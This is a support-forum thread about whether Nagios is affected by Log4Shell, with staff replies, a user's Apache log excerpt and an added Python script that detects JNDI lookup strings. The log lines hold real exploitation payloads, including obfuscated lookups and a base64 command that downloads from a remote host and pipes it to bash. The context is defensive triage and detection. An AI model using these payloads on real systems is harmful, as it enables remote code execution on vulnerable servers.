Log4Shell vulnerability

Post by mejokj »

Hi Team,

Is Nagios affected by the Log4Shell vulnerability, and is there any security advisory for it?

Thanks

Re: Log4Shell vulnerability

Post by benjaminsmith »

Hi mejokj,

Thanks for contacting the support team at Nagios.

We have an update with more information on this vulnerability on our company blog at:

https://www.nagios.com/news/2021/12/upd ... erability/

Regards,
Benjamin
As of May 25th, 2018, all communications with Nagios Enterprises and its employees are covered under our new Privacy Policy.

Be sure to check out our Knowledgebase for helpful articles and solutions!

Re: Log4Shell vulnerability

Post by mejokj »

Thanks, Benjamin, for the reply.

We have gone through the document and understand that no impact has been discovered for Nagios so far.

And currently, there is no action required for the Log4j vulnerability, right?

And how do we confirm from our side? Is there anything we can check?

Re: Log4Shell vulnerability

Post by benjaminsmith »

Hi,

If you've installed any Java-based packages on your systems, my recommendation would be to reach out to your admins/security teams to search your systems for the impacted version of this package.

Regards,
Benjamin

Re: Log4Shell vulnerability

Post by DonForigua »

Hi, seeing the Apache logs, I have:

167.71.13.196 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31353a34342e3535373734353039375a227d649eb0f26bf2b0c4880aca4a844a5cfb} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:16:22 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31363a32322e3233343636373236355a227d7d83c441b293c5626d9493d671407547} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:24 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32342e3636373437363939345a227d755c304a1590c222821a248253a08e3d} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:25 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32352e3231363433333931395a227d9a7d3bb2ff411b9afaa13b4629c5b159} HTTP/1.1\n" 400 226 "-" "-"                                                                
195.54.160.149 - - [14/Dec/2021:16:28:45 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4N
zQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo} HTTP/1.1" 200 3245 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZ
XQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8
xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}"                                                                                                                   
The last line has HTTP/1.1 200, was the attack successful?
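Detection logic for the lookup strings in the log lines above, including the ${lower:...} and ${::-...} nesting and URL-encoded variants; this is an added example, not part of the original post. The regexes, function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Nested lookups hide the keyword, as in the posted log lines: ${lower:l} yields
# the letter, ${::-j} yields its default value "j".
OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}", re.I)
JNDI = re.compile(r'\$\{jndi:(\w+)://([^/\s}"]+)', re.I)
ACCESS = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ".*?" (\d{3}) ')

# Constructed sample lines (documentation addresses, placeholder paths).
SAMPLE = [
    '192.0.2.10 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://192.0.2.10:9876/x} HTTP/1.1" 400 226 "-" "-"',
    '198.51.100.7 - - [14/Dec/2021:16:28:45 -0500] "GET / HTTP/1.1" 200 3245 "-" "${${::-j}${::-n}${::-d}${::-i}:${lower:l}${lower:d}${lower:a}${lower:p}://198.51.100.7:12344/x}"',
    '203.0.113.5 - - [14/Dec/2021:16:30:00 -0500] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [14/Dec/2021:16:31:00 -0500] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fx%7D HTTP/1.1" 404 209 "-" "-"',
]


def deobfuscate(text, max_rounds=10):
    """Collapse nested lookups innermost-first until nothing is left to replace."""
    for _ in range(max_rounds):
        text, replaced = OBFUSCATION.subn(lambda m: m.group(m.lastindex), text)
        if replaced == 0:
            break
    return text


def scan(lines):
    """Return one record per access-log line that carries a JNDI lookup string."""
    hits = []
    for line in lines:
        decoded = unquote(line)
        plain = JNDI.search(decoded)
        m = plain or JNDI.search(deobfuscate(decoded))
        if not m:
            continue
        meta = ACCESS.match(line)
        hits.append({
            "client": meta.group(1) if meta else None,
            "status": int(meta.group(3)) if meta else None,  # the web server's reply only
            "scheme": m.group(1).lower(),
            "callback": m.group(2),  # host:port to look for in egress/firewall logs
            "obfuscated": plain is None,
        })
    return hits


if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The status field is only the web server's answer to the request (200 means it served the requested path). Whether a Java component evaluated the string shows up as outbound connections to the callback host and port, not in the access log.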

Re: Log4Shell vulnerability

Post by gsmith »

Hi

You need to work with your admins/security teams to assess any risk you may face.

Nagios Enterprises takes data security and information integrity very seriously. Currently, we are evaluating our use of Apache products and our exposure to the vulnerability described in CVE-2021-44228.

We have updated our company blog with important information on this issue.

https://www.nagios.com/news/2021/12/update-on-apache-log4j-vulnerability/

While Nagios Core, NagiosXI, and Fusion use or depend upon Apache products they do not appear to be using vulnerable versions of the products as identified in the MITRE notification. While Nagios Log Server does use Log4j components and includes plugins for receiving Log4j data, we don't believe the product is vulnerable at this time. 

Due to the complexity and flexibility of our products and their ability to integrate into a wide variety of environments, care should be taken to limit the exposure of systems to trusted entities.

As always we also recommend that you keep your system up to date and follow the guidance of your operating system vendor and integrated application providers as is appropriate for your environment.

If we discover any vulnerabilities in Nagios software, we will immediately respond and release a fix ASAP. Please check our security page for updates.

https://www.nagios.com/products/security
Thank you